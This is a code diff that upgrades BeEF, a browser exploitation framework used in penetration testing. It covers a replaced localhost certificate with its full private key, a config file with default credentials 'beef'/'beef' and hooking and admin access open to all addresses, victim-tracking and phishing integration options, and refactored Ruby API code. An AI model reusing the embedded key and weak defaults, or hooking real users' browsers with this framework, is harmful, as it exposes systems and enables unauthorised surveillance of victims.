-0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
-F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
-kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
-kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
-B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
-JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
-GkY0IBg9+j6XX4JwEXxCGt0a
+MIIECTCCAnGgAwIBAgIUbx/YybkSOL8uO0qikl/wsL4xLeIwDQYJKoZIhvcNAQEL
+BQAwFDESMBAGA1UEAwwJbG9jYWxob3N0MB4XDTE5MDIxNjEzMjYxNFoXDTI5MDIx
+MzEzMjYxNFowFDESMBAGA1UEAwwJbG9jYWxob3N0MIIBojANBgkqhkiG9w0BAQEF
+AAOCAY8AMIIBigKCAYEAteQJ2fooOffGU8jFkArCsFaJZW5WSuc5j7i2ciG0LY2C
+lVg1Uy7/6xHe048RJAD9AnWajf9Jt7NpAAoyRmFJOepZS8CStON4mBrKUFI4rzAB
+W9F7nov5+k+GK11kuvPFyAQCGs82RpGXsEP2ktsimsWvI8jnt7B+DXltqxeWavXB
+TYOTsDhyRxXcNPGgenOabtya1XsAecTs4JPOsV4L/hnTS70X8BNOcMRFRNb3W5C0
+w3vnid9Q6jhDRC6ghpeVWgnlymqV0Y6v1pbWZRs71sKQF/V5Td5zA8pr9r30YFAD
+Wbkb33vicU5BkZ8PQeUygqtqKOhni9i8Yg1otkXmqWsmo5sV/GgKHvkxOoQBlzv3
+hhMyYEnKjhPuepKl/VW17zRFdMCQZbvtW9/WBX4AwtKNAxYiRRO5jvDU1pX0nfXw
+86ZPfkbkPdJJYqZqqsOSSOVSpCkoLJv/owaY10XwgSEl8rA+3t03/9B6s09Q0o28
+0zXu/CMiSBNSEJlJSNdZAgMBAAGjUzBRMB0GA1UdDgQWBBTULhamHun+PWMkHDzg
+5yHcv0KOmTAfBgNVHSMEGDAWgBTULhamHun+PWMkHDzg5yHcv0KOmTAPBgNVHRMB
+Af8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBgQAZo9xPTktJ1aTxTXfLKivqbPin
+5CiRl5DWh1niPUFowmuAGbDCYOHA/+fzhBhFWj3LVaX2dQSpYxiqnfb5FWaxNK+8
+9A0AKgf8f2cpJ22QleDFOsyCw8jxzSfmOKKQLifY5Ty5C5P8xb9T0B7LbyR8r17p
+sr77eM/5tBpsIIh40AZjoDhi/HHrtqxEb+DgnTRHIBMmzvwkk+v4iXBDCO5BHFof
+gVXOF3MrovhH+qA8HFl9diJ6MtTltVAqI0eShBLd2MJ068qKqb+I6pyXGmlrk9Ei
+H0XrKlKEKjyum6ZEPr5Mn+NA+4ePRv1mPHoaopJoNhgRislfryGFLJwxeuMJfQOU
+oZTmgK8Ur0TYLl/wqf9avX3A8hkffNZXukmzNwjzLVG252RPA2Iq3y1+7VgOjaBJ
+rNbwArYInhfF5hJesjo3LAD9H29dFxR6dztpOcDCkaOZEdlz+fvqUFYJzwuHmuSi
+DLyqAOr77CjoWEMSHcXUEGUeJDKVqLgzqC9lqf4=
 -----END CERTIFICATE-----

beef_key.pem

@@ -1,16 +1,40 @@
 -----BEGIN PRIVATE KEY-----
-MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
-X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
-KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
-0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
-HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
-4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
-5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
-26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
-yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
-rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
-AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
-QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
-WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
-yBgay+U9QuoEO425
+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
+jyItP2FJBbw7BlIq7t2c2G66
 -----END PRIVATE KEY-----

config.yaml

@@ -1,64 +1,91 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.8-alpha'
+    version: '0.4.7.2-alpha'
+    # More verbose messages (server-side)
     debug: false
+    # More verbose messages (client-side)
+    client_debug: false
+    # Used for generating secure tokens
+    crypto_default_value_length: 80
 
+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin interface
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
+    # Interface / IP restrictions
     restrictions:
-        # subnet of browser ip addresses that can hook to the framework
-        permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI
-        # permitted_ui_subnet: "127.0.0.1/32"
-        permitted_ui_subnet: "0.0.0.0/0"
+        # subnet of IP addresses that can hook to the framework
+        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that can connect to the admin UI
+        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
+        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
+        # slow API calls to 1 every  api_attempt_delay  seconds
+        api_attempt_delay: "0.05"
 
+    # HTTP server
     http:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
-        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
-        # It's not advised to decrease it with tons of hooked browsers (more than 50),
-        # because it might impact performance. Also, enable WebSockets is generally better.
-        xhr_poll_timeout: 5000
-        # if running behind a nat set the public ip address here
-        #public: ""
-        #public_port: "" # port setting is experimental
-        # DNS
-        dns_host: "localhost"
-        dns_port: 53
-        web_ui_basepath: "/ui"
+
+        # Decrease this setting to 1,000 (ms) if you want more responsiveness
+        #  when sending modules and retrieving results.
+        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
+        #  when hooking lots of browsers (50+).
+        # Enabling WebSockets is generally better (beef.websocket.enable)
+        xhr_poll_timeout: 1000
+
+        # Host Name / Domain Name
+        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
+        #   set the public hostname below:
+        #public: ""      # public hostname/IP address
+
+        # Reverse Proxy / NAT
+        # If you want BeEF to be accessible behind a reverse proxy or NAT,
+        #   set both the publicly accessible hostname/IP address and port below:
+        #public: ""      # public hostname/IP address
+        #public_port: "" # public port (experimental)
+
+        # Hook
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
-        session_cookie_name: "BEEFSESSION"
 
-        # Allow one or multiple domains to access the RESTful API using CORS
-        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        # Allow one or multiple origins to access the RESTful API using CORS
+        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
         restful_api:
             allow_cors: false
             cors_allowed_domains: "http://browserhacker.com"
 
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
-          enable: false
-          secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
-          port: 61985 # WS: good success rate through proxies
-          secure_port: 61986 # WSSecure
-          ws_poll_timeout: 1000 # poll BeEF every second
+            enable: false
+            port: 61985 # WS: good success rate through proxies
+            # Use encrypted 'WebSocketSecure'
+            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
+            secure: true
+            secure_port: 61986 # WSSecure
+            ws_poll_timeout: 1000 # poll BeEF every second
+            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
             enable: true
-            type: "apache" #supported: apache, iis
-
+            type: "apache" # Supported: apache, iis, nginx
+            hook_404: false # inject BeEF hook in HTTP 404 responses
+            hook_root: false # inject BeEF hook in the server home page
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
+            # used in beef.http.public (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -80,44 +107,63 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
-        db_port: 5432
+        db_port: 3306
         db_name: "beef"
         db_user: "beef"
-        db_passwd: "beef123"
+        db_passwd: "beef"
         db_encoding: "UTF-8"
 
-    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
-    credentials:
-        user:   "beef"
-        passwd: "beef"
-
-    # Autorun modules as soon the browser is hooked.
-    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    # Autorun Rule Engine
     autorun:
+        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
+        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
+        # continue execution regardless of results.
+        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
+        result_poll_interval: 300
+        result_poll_timeout: 5000
+
+        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
+        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
+        continue_after_timeout: true
+
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false
+
+    # IP Geolocation
+    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
+    geoip:
         enable: true
-        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
-        allow_user_notify: true
+        database: '/opt/GeoIP/GeoLite2-City.mmdb'
 
-    crypto_default_value_length: 80
-
-    # Enable client-side debugging
-    client:
-        debug: false
+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false
 
     # You may override default extension configuration parameters here
+    # Note: additional experimental extensions are available in the 'extensions' directory
+    #       and can be enabled via their respective 'config.yaml' file
     extension:
+        admin_ui:
+            enable: true
+            base_path: "/ui"
+        demos:
+            enable: true
+        events:
+            enable: true
+        evasion:
+            enable: false
         requester:
             enable: true
         proxy:
             enable: true
+        network:
+            enable: true
         metasploit:
             enable: false
         social_engineering:
             enable: true
-        evasion:
-            enable: false
-        console:
-             shell:
-                enable: false
-        ipec:
+        xssrays:
             enable: true

core/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,168 +7,205 @@
 module BeEF
   module API
 
+    #
     # Registrar class to handle all registered timed API calls
+    #
     class Registrar
-
       include Singleton
 
+      #
       # Create registrar
+      #
       def initialize
         @registry = []
         @count = 1
       end
 
       # Register timed API calls to an owner
+      #
       # @param [Class] owner the owner of the API hook
       # @param [Class] c the API class the owner would like to hook into
       # @param [String] method the method of the class the owner would like to execute
       # @param [Array] params an array of parameters that need to be matched before the owner will be called
+      #
       def register(owner, c, method, params = [])
-        if self.verify_api_path(c, method)
-          if not self.registered?(owner, c, method, params)
-            id = @count
-            @registry << {
-                'id' => id,
-                'owner' => owner,
-                'class' => c,
-                'method' => method,
-                'params' => params
-            }
-            @count += 1
-            return id
-          else
-            print_debug "API Registrar: Attempting to re-register API call #{c.to_s} :#{method.to_s}"
-          end
-        else
-          print_error "API Registrar: Attempted to register non-existant API method #{c.to_s} :#{method.to_s}"
+        unless verify_api_path(c, method)
+          print_error "API Registrar: Attempted to register non-existant API method #{c} :#{method}"
+          return
         end
+
+        if registered?(owner, c, method, params)
+          print_debug "API Registrar: Attempting to re-register API call #{c} :#{method}"
+          return
+        end
+
+        id = @count
+        @registry << {
+          'id'     => id,
+          'owner'  => owner,
+          'class'  => c,
+          'method' => method,
+          'params' => params
+        }
+        @count += 1
+
+        id
       end
 
+      #
       # Tests whether the owner is registered for an API hook
+      #
       # @param [Class] owner the owner of the API hook
       # @param [Class] c the API class
       # @param [String] method the method of the class
       # @param [Array] params an array of parameters that need to be matched
+      #
       # @return [Boolean] whether or not the owner is registered
+      #
       def registered?(owner, c, method, params = [])
-        @registry.each{|r|
-          if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
-            return true
-          end
-        }
-        return false
+        @registry.each do |r|
+          next unless r['owner'] == owner
+          next unless r['class'] == c
+          next unless r['method'] == method
+          next unless is_matched_params? r, params
+          return true
+        end
+        false
       end
 
+      #
       # Match a timed API call to determine if an API.fire() is required
+      #
       # @param [Class] c the target API class
       # @param [String] method the method of the target API class
       # @param [Array] params an array of parameters that need to be matched
+      #
       # @return [Boolean] whether or not the arguments match an entry in the API registry
+      #
       def matched?(c, method, params = [])
-        @registry.each{|r|
-          if r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
-            return true
-          end
-        }
-        return false
+        @registry.each do |r|
+          next unless r['class'] == c
+          next unless r['method'] == method
+          next unless is_matched_params? r, params
+          return true
+        end
+        false
       end
 
+      #
       # Un-registers an API hook
+      #
       # @param [Integer] id the ID of the API hook
+      #
       def unregister(id)
-        @registry.delete_if{|r|
-          r['id'] == id
-        }
+        @registry.delete_if {|r| r['id'] == id }
       end
 
+      #
       # Retrieves all the owners and ID's of an API hook
       # @param [Class] c the target API class
       # @param [String] method the method of the target API class
       # @param [Array] params an array of parameters that need to be matched
+      #
       # @return [Array] an array of hashes consisting of two keys :owner and :id
+      #
       def get_owners(c, method, params = [])
         owners = []
-        @registry.each{|r|
-          if r['class'] == c and r['method'] == method
-            if self.is_matched_params?(r, params)
-              owners << { :owner => r['owner'], :id => r['id']}
-            end
-          end
-        }
-        return owners
+        @registry.each do |r|
+          next unless r['class'] == c
+          next unless r['method'] == method
+          next unless is_matched_params? r, params
+          owners << { :owner => r['owner'], :id => r['id'] }
+        end
+        owners
       end
 
+      #
       # Verifies that the api_path has been regitered
       # Verifies the API path has been registered.
+      #
       # @note This is a security precaution
+      #
       # @param [Class] c the target API class to verify
       # @param [String] m the target method to verify
+      #
       def verify_api_path(c, m)
-        return (c.const_defined?('API_PATHS') and c.const_get('API_PATHS').has_key?(m))
+        (c.const_defined?('API_PATHS') && c.const_get('API_PATHS').key?(m))
       end
 
+      #
       # Retrieves the registered symbol reference for an API hook
+      #
       # @param [Class] c the target API class to verify
       # @param [String] m the target method to verify
+      #
       # @return [Symbol] the API path
+      #
       def get_api_path(c, m)
-        return (self.verify_api_path(c, m)) ? c.const_get('API_PATHS')[m] : nil;
+        verify_api_path(c, m) ? c.const_get('API_PATHS')[m] : nil
       end
 
+      #
       # Matches stored API params to params
+      #
       # @note If a stored API parameter has a NilClass the parameter matching is skipped for that parameter
       # @note By default this method returns true, this is either because the API.fire() did not include any parameters or there were no parameters defined for this registry entry
+      #
       # @param [Hash] reg hash of registry element, must contain 'params' key
       # @param [Array] params array of parameters to be compared to the stored parameters
+      #
       # @return [Boolean] whether params matches the stored API parameters
+      #
       def is_matched_params?(reg, params)
         stored = reg['params']
-        if stored.length == params.length
-          matched = true
-          stored.each_index{|i|
-            next if stored[i] == nil
-            if not stored[i] == params[i]
-              matched = false
-            end
-          }
-          return false if not matched
+        return true unless stored.length == params.length
+
+        stored.each_index do |i|
+          next if stored[i].nil?
+          return false unless stored[i] == params[i]
         end
-        return true
+
+        true
       end
 
+      #
       # Fires all owners registered to this API hook
+      #
       # @param [Class] c the target API class
       # @param [String] m the target API method
       # @param [Array] *args parameters passed for the API call
-      # @return [Hash, NilClass] returns either a Hash of :api_id and :data if the owners return data, otherwise NilClass
+      #
+      # @return [Hash, NilClass] returns either a Hash of :api_id and :data
+      #         if the owners return data, otherwise NilClass
+      #
       def fire(c, m, *args)
-        mods = self.get_owners(c, m, args)
-        if mods.length > 0
-          data = []
-          if self.verify_api_path(c, m) and c.ancestors[0].to_s > "BeEF::API"
-            method = self.get_api_path(c, m)
-            mods.each do |mod|
-              begin
-                #Only used for API Development (very verbose)
-                #print_info "API: #{mod} fired #{method}"
-                result = mod[:owner].method(method).call(*args)
-                if not result == nil
-                  data << {:api_id => mod[:id], :data => result}
-                end
-              rescue Exception => e
-                print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
-              end
-            end
-          else
-            print_error "API Path not defined for Class: #{c.to_s} method:#{method.to_s}"
-          end
-          return data
+        mods = get_owners(c, m, args)
+        return nil unless mods.length.positive?
+
+        unless verify_api_path(c, m) && c.ancestors[0].to_s > 'BeEF::API'
+          print_error "API Path not defined for Class: #{c} method:#{method}"
+          return []
         end
-        return nil
+
+        data = []
+        method = get_api_path(c, m)
+        mods.each do |mod|
+          begin
+            # Only used for API Development (very verbose)
+            # print_info "API: #{mod} fired #{method}"
+
+            result = mod[:owner].method(method).call(*args)
+            unless result.nil?
+              data << { :api_id => mod[:id], :data => result }
+            end
+          rescue => e
+            print_error "API Fire Error: #{e.message} in #{mod}.#{method}()"
+          end
+        end
+
+        data
       end
-
     end
-
   end
 end
 

core/api/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server/hook.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/bootstrap.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -29,8 +29,12 @@ require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 
-# @note Include the distributed engine
-require 'core/main/distributed_engine/models/rules'
+# @note Include the autorun engine
+require 'core/main/autorun_engine/models/rule'
+require 'core/main/autorun_engine/models/execution'
+require 'core/main/autorun_engine/parser'
+require 'core/main/autorun_engine/engine'
+require 'core/main/autorun_engine/rule_loader'
 
 ## @note Include helpers
 require 'core/module'
@@ -41,11 +45,13 @@ require 'core/hbmanager'
 
 ## @note Include RESTful API
 require 'core/main/rest/handlers/hookedbrowsers'
+require 'core/main/rest/handlers/browserdetails'
 require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/handlers/server'
+require 'core/main/rest/handlers/autorun_engine'
 require 'core/main/rest/api'
 
 ## @note Include Websocket

core/core.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,7 +10,6 @@ end
 end
 
 # @note Includes database models - the order must be consistent otherwise DataMapper goes crazy
-require 'core/main/models/user'
 require 'core/main/models/commandmodule'
 require 'core/main/models/hookedbrowser'
 require 'core/main/models/log'
@@ -22,7 +21,6 @@ require 'core/main/models/browserdetails'
 # @note Include the constants
 require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
-require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
 require 'core/main/constants/hardware'
 
@@ -32,12 +30,9 @@ require 'core/main/command'
 require 'core/main/crypto'
 require 'core/main/logger'
 require 'core/main/migration'
+require 'core/main/geoip'
 
 # @note Include the command line parser and the banner printer
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 
-# @note Include rubyzip lib
-require 'zip'
-
-

core/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,36 +10,40 @@ module BeEF
     # @param [String] ext the extension key
     # @return [Boolean] whether or not the extension exists in BeEF's configuration
     def self.is_present(ext)
-      return BeEF::Core::Configuration.instance.get('beef.extension').has_key?(ext.to_s)
+      BeEF::Core::Configuration.instance.get('beef.extension').key? ext.to_s
     end
 
     # Checks to see if extension is enabled in configuration
     # @param [String] ext the extension key
     # @return [Boolean] whether or not the extension is enabled 
     def self.is_enabled(ext)
-      return (self.is_present(ext) and BeEF::Core::Configuration.instance.get('beef.extension.'+ext.to_s+'.enable') == true)
+      return false unless is_present(ext)
+      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.enable") == true
     end
 
     # Checks to see if extension has been loaded
     # @param [String] ext the extension key
-    # @return [Boolean] whether or not the extension is loaded 
+    # @return [Boolean] whether or not the extension is loaded
     def self.is_loaded(ext)
-      return (self.is_enabled(ext) and BeEF::Core::Configuration.instance.get('beef.extension.'+ext.to_s+'.loaded') == true)
+      return false unless is_enabled(ext)
+      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.loaded") == true
     end
 
     # Loads an extension 
     # @param [String] ext the extension key
     # @return [Boolean] whether or not the extension loaded successfully
